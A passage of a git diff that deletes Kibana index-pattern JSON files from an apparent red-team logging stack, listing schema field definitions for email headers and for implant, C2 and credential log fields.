- { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-authsource", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-authsource.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-authsource" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-expirationinterval", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-expirationinterval.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-expirationinterval" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-expirationintervalreason", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-expirationintervalreason.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-expirationintervalreason" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-expirationstarttime", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-expirationstarttime.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-expirationstarttime" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-expirationstarttimereason", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-expirationstarttimereason.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-expirationstarttimereason" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-messagedirectionality", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-messagedirectionality.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-messagedirectionality" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-network-message-id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-network-message-id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-network-message-id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-pcl", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-pcl.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-pcl" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-recordreviewcfmtype", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-recordreviewcfmtype.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-recordreviewcfmtype" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-scl", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-scl.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-scl" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-processed-by-bccfoldering", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-processed-by-bccfoldering.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-processed-by-bccfoldering" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-senderadcheck", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-senderadcheck.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-senderadcheck" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-transport-crosstenantheaderspromoted", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-transport-crosstenantheaderspromoted.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-transport-crosstenantheaderspromoted" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-transport-crosstenantheadersstamped", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-transport-crosstenantheadersstamped.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-transport-crosstenantheadersstamped" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-transport-crosstenantheadersstripped", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-transport-crosstenantheadersstripped.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-transport-crosstenantheadersstripped" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-transport-endtoendlatency", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-transport-endtoendlatency.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-transport-endtoendlatency" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-transport-forked", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-transport-forked.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-transport-forked" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-has-attach", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-has-attach.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-has-attach" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-office365-filtering-correlation-id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-office365-filtering-correlation-id-prvs", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-office365-filtering-correlation-id-prvs.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-office365-filtering-correlation-id-prvs" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-office365-filtering-correlation-id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-office365-filtering-correlation-id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-oob-tlc-oobclassifiers", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-oob-tlc-oobclassifiers.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-oob-tlc-oobclassifiers" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-publictraffictype", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-publictraffictype.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-publictraffictype" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-tnef-correlator", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-tnef-correlator.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-tnef-correlator" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-traffictypediagnostic", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-traffictypediagnostic.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-traffictypediagnostic" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-userlastlogontime", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-userlastlogontime.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-userlastlogontime" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-msametadata", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-msametadata.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-msametadata" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-msapipeline", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-msapipeline.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-msapipeline" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-notifications", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-notifications.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-notifications" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-originating-ip", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-originating-ip.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-originating-ip" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-originatororg", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-originatororg.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-originatororg" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-received", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-received.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-received" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-sender-ip", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-sender-ip.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-sender-ip" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-sid-pra", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-sid-pra.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-sid-pra" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-sid-result", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-sid-result.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-sid-result" - } - }, - "type": "string" - } - ], - "timeFieldName": "@timestamp", - "title": "email-*" - }, - "coreMigrationVersion": "7.16.3", - "id": "email", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171860673, - 15 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json deleted file mode 100644 index b8741e1c..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json +++ /dev/null @@ -1,1895 +0,0 @@ -[ - { - "attributes": { - "fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "@version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.ephemeral_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.hostname", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "c2.log.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "c2.message", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "c2.program", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "c2.timestamp", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.credential", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.host", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.realm", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.source", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.username", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "ecs.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "error.message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.stack_trace", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "error.stack_trace.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "error.stack_trace" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "error.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.action", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.category", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.created", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.dataset", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "event.duration", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.end", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.ingested", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.kind", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.module", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.original", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.outcome", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.provider", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "event.risk_score", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "event.risk_score_norm", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "event.sequence", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "event.severity", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "event.start", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.timezone", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.url", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.directory", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.directory_local", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.hash.sha512", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "file.path.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "file.path" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.path_local", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "file.path_local.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "file.path_local" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "file.size", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "file.url", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.architecture", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.domain_ext", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.as.organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "integer" - ], - "name": "host.geo.as.organization.number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "host.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": 